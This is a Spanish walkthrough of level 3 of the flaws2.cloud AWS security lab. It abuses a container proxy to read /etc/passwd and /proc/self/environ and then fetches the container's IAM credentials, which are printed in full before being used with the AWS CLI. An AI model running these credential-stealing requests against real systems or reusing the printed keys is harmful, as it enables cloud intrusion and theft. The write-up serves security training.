Level 3

http://level3-oc6ou6dnkw8sszwvdrraxc5t5udrsw3s.flaws2.cloud/

Nos dicen que el contenedor al que tenemos acceso tiene un proxy que se usa así:

http://container.target.flaws2.cloud/proxy/http://flaws.cloud

Esto nos recuerda al Level 5 de flaws.cloud.

Probamos

curl http://container.target.flaws2.cloud/proxy/http://169.254.169.254/latest/meta-data/
curl http://container.target.flaws2.cloud/proxy/169.254.169.254/latest/meta-data/

Y no sale nada.

Tenemos LFI

curl http://container.target.flaws2.cloud/proxy/file:///etc/passwd --output - ; echo

Si probamos esto podemos dumpear las variables de entorno de dentro del contenedor:

curl http://container/proxy/file:///proc/self/environ --output - ; echo
HOSTNAME=ip-172-31-47-179.ec2.internal

HOME=/root

AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/7e4ba77c-58ec-4523-bb72-1f719c03a12c

AWS_EXECUTION_ENV=

AWS_ECS_FARGATEECS_AGENT_URI=http://169.254.170.2/api/cb2fb3252d31461abd9fcd33b7980cc5-3779599274

AWS_DEFAULT_REGION=us-east-1

ECS_CONTAINER_METADATA_URI_V4=http://169.254.170.2/v4/cb2fb3252d31461abd9fcd33b7980cc5-3779599274E

CS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/cb2fb3252d31461abd9fcd33b7980cc5-3779599274

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

AWS_REGION=us-east-1

PWD=/

AWS_CONTAINER_CREDENTIALS_RELATIVE_URI es la variable que necesitábamos para saber donde están las credenciales de IAM del contenedor

curl http://container.target.flaws2.cloud/proxy/http://169.254.170.2/v2/credentials/7e4ba77c-58ec-4523-bb72-1f719c03a12c --output - ; echo
{
   "RoleArn":"arn:aws:iam::653711331788:role/level3",
   "AccessKeyId":"ASIAZQNB3KHGBWAKPW24",
   "SecretAccessKey":"t9FATFXqauplJJde8ZmKvBi4AqrILYIxP+3V2/v4",
   "Token":"IQoJb3JpZ2luX2VjEJn//////////wEaCXVzLWVhc3QtMSJGMEQCIGGTHtsJmJm3av954LlJXUa9vwP+BhXgDZjawUxa7RvNAiBzXKmxzBcsi23JCgBPgoR8q+8vDsFXxDZ8pPzeQFJjjSrjAwhiEAMaDDY1MzcxMTMzMTc4OCIMRJlAOBTgP5piPgpZKsADpIalEfU1QSECkJ+52DMUvOevvHa5cOU1bQM8TMSiCXDhLAjg8eT85vehXoENs/5aRgNZe74U3+Q0/cXn2hHO2AlKswMuHxG40uYx8z/0fZkXz/SBJnEcMLNajywXN9+jAgek/9Zf6ZKEA/Hi4OnQsKg5p1WXexwl9ttaHddpLADDdrj7wLxe/VBqz6G7o6PqemI4o06sLkKDXhIP73ypP6WZwZvw2EFZJN24Exg759bDVNRe/7wW4kE14DgVZYMi/8e29BGcjeVCsG9DDIRLC/EHjRDgStdeNzffVcbBMKfXKD7b44QLQMC4kSGuAnWlmlz8BROGkdkSU+M/RRTuC8rEysUgAxl/Koss5KbZ8KbjYkn5UKM41LOWWiuUZUMiaE8KgRN4fGvWfSLjU86HCtgLJFVsSk7UWKl0P8Wdu8CSLhD6eBcucYw2W7nlOr1FQkQ2zXNHAXkheuAYy1jlazR8SuROO3RwpbI0xGAczBL5tipam64pG2S5aHwyav0zmqDl1r1A/CbaOXqRhfy1/esacM40zkpwPX+pOmX3GcOZ1uKOoKZ+xmnfXbstHrQExl9GCBkC2MamAf1p5n9VNDDptaPIBjqmAVb+epjVStCVmkTuaK4cBn9d/8ld73YOIWWPa3tJMNdgYfsirhlVpgQYvWUAsRXJH2N1AiQCC9cDpByQ/JNNFh6Qgvjxr0iEij0X67fOwuL5At5GqaXwPhy6L68WoKptXnvgArIqCP54r7GmwGjVbu8550IGyJopU2De2WZ9oAdtG53O45sqJqpPW91IbCOytNieXRMRoxMBgyFmTlSLC++CiCuYFFw=",
   "Expiration":"2025-11-03T22:40:09Z"
}

Nos creamos un profile

aws configure --profile level3

whoami

aws sts get-caller-identity --profile level3

Podemos listar buckets

aws s3 ls --profile level3

http://the-end-962b72bjahfm5b4wcktm8t9z4sapemjb.flaws2.cloud/